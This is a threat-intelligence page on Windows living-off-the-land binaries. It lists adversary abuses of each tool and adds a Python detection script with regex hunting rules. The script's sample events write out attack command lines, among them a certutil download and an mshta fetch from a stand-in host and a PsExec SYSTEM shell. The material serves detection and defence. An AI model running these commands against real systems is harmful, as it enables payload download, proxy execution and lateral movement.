Living-Off-the-Land Binaries Cyber Threat Intelligence Driven
Certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services.
An adversary may use [certutil] to:
- Download files from a given URL
- Base64 encode collected data
- Decode binaries hidden inside certificate files as Base64 information
- Install browser root certificates as a precursor to performing Adversary-in-the-Middle
BITSAdmin is a command-line tool used to create and manage BITS jobs.
An adversary may use [BITSAdmin] to:
- Create BITS jobs to launch a malicious process
- Create BITS jobs to upload files from a compromised host
- Create BITS jobs to upload and/or download files
- Create BITS jobs to upload and/or download files from SMB file servers
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility.
An adversary may use [Mshta] to:
- Execute malicious payloads
- Execute a malicious .hta file
- Execute malicious JavaScript code
- Execute HTML pages
- Execute malicious VBScript
- Execute DLLs
- Download and execute applications from a remote server
Adversaries may abuse Rundll32.exe to proxy execution of malicious code.
An adversary may use [Rundll32] to:
- Execute binaries, scripts, and Control Panel Item files, and execute code via proxy to avoid triggering security tools
- Establish persistence within Registry Run Keys / Startup Folder entries to execute malicious DLLs
- Execute an initial infection process and launch a malicious DLL
- Load a malicious DLL
- Execute the Cobalt Strike Beacon loader DLL
- Execute commands and scripts
Adversaries may abuse PsExec.exe to move laterally between computers on the company's network and install their malicious tools on multiple assets.
An adversary may use [PsExec] to:
- Remotely create accounts on target systems
- Leverage Windows services to escalate privileges from administrator to SYSTEM
- Download or upload a file over a network share
- Write programs to the ADMIN$ network share to execute commands on remote systems
- Execute binaries on remote systems using a temporary Windows service
Adversaries may abuse the Windows Task Scheduler (schtasks.exe) to perform task scheduling for initial or recurring execution of malicious code.
An adversary may use [Schtasks] to:
- Achieve persistence via scheduled tasks
- Create a scheduled SYSTEM task that runs when a user logs in
- Run programs at system startup
- Run malicious scripts on a compromised host (.vbe, .dat)
- Download additional malware, including Cobalt Strike and a PowerShell loader
- Execute malware during lateral movement
- Bypass UAC
- Maintain RDP backdoors
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems.
An adversary may use [Regsvr32] to:
- Bypass application control techniques
- Execute a COM scriptlet that dynamically downloads a backdoor and injects it into memory
- Execute malicious scripts
- Load malicious DLLs
- Execute malicious DLLs
- Execute malicious payloads
- Run a remote scriptlet that drops a file and executes it
- Ensure persistence at system boot
- Run a .sct file for execution
Reg.exe is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. Utilities such as Reg.exe are known to be used by persistent threat actors.
An adversary may use [reg.exe] to:
- Interact with and modify the Windows Registry of a local or remote system
- Gather details from the Windows Registry of a local or remote system
- Find/extract credentials from the Registry
- Check for installed software on the system
- Retrieve proxy information from the Registry
- Remove/deactivate security settings (e.g. AV/EDR/FW/UAC)
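As an added example (not part of this page or its lookup tool), the following Python triage script turns the behaviours listed for each binary above into command-line indicators and runs them over constructed Sysmon-style process-creation events. The single-line "Key: value" event layout, the sample events and the regexes are assumptions; the patterns are deliberately broad starting points for hunting, not tuned production rules.

```python
from __future__ import annotations
import re

# Command-line indicators per LOLBin on this page, mapped to the behaviour each
# corresponds to. Case-insensitive and deliberately broad: starting points, not tuned rules.
RULES = {
    "certutil.exe": [(r"-urlcache|-verifyctl", "download file from URL"),
                     (r"-encode", "base64-encode collected data"),
                     (r"-decode", "decode binary hidden in certificate file"),
                     (r"-addstore", "install root certificate (AiTM precursor)")],
    "bitsadmin.exe": [(r"/transfer|/create|/addfile|/setnotifycmdline", "BITS job transfer or launch")],
    "mshta.exe": [(r"https?://|\.hta\b|javascript:|vbscript:", "proxy execution of HTA/script")],
    "rundll32.exe": [(r"\\users\\|\\temp\\|\\programdata\\|javascript:", "DLL/script from user-writable path")],
    "psexec.exe": [(r"\\\\|-s\b", "remote execution / SYSTEM via service")],
    "schtasks.exe": [(r"/create", "scheduled task created (persistence / lateral movement)")],
    "regsvr32.exe": [(r"/i:https?://|scrobj\.dll|\.sct\b", "remote or COM scriptlet execution")],
    "reg.exe": [(r"\bsave\b|EnableLUA|DisableAntiSpyware", "hive export or security setting change")],
}
COMPILED = {img: [(re.compile(p, re.I), why) for p, why in rs] for img, rs in RULES.items()}

# Assumed event layout: one line of 'Key: value' pairs with CommandLine as the last field.
FIELD = re.compile(r"Image:\s*(?P<image>\S+).*?CommandLine:\s*(?P<cmd>.*)$", re.I)

def triage(event: str) -> list[tuple[str, str]]:
    """Return (image, behaviour) hits for one process-creation event, [] if none."""
    m = FIELD.search(event)
    if not m:
        return []
    image = m.group("image").rsplit("\\", 1)[-1].lower()   # basename of the Image field
    cmd = m.group("cmd")
    return [(image, why) for rx, why in COMPILED.get(image, []) if rx.search(cmd)]

def triage_log(events: list[str]) -> list[tuple[int, str, str]]:
    """Run triage over a batch; returns (event_index, image, behaviour) for each hit."""
    return [(i, img, why) for i, ev in enumerate(events) for img, why in triage(ev)]

# Constructed sample events (not real telemetry); the last two are benign controls.
SAMPLE = [
    r"EventID: 1 Image: C:\Windows\System32\certutil.exe CommandLine: certutil -urlcache -split -f http://example.invalid/x.txt x.txt",
    r"EventID: 1 Image: C:\Windows\System32\mshta.exe CommandLine: mshta http://example.invalid/page.hta",
    r"EventID: 1 Image: C:\Tools\PsExec.exe CommandLine: PsExec.exe \\HOST1 -s cmd.exe",
    r"EventID: 1 Image: C:\Windows\System32\certutil.exe CommandLine: certutil -dump cert.cer",
    r"EventID: 1 Image: C:\Windows\System32\notepad.exe CommandLine: notepad.exe notes.txt",
]

if __name__ == "__main__":
    for hit in triage_log(SAMPLE):
        print(hit)
```

Matching on the image name alone (the lookup the page's input performs) is a weak signal for binaries such as rundll32.exe and schtasks.exe that run constantly on healthy hosts; pairing it with the command-line indicator, the parent process and the file path is what keeps the alert volume manageable.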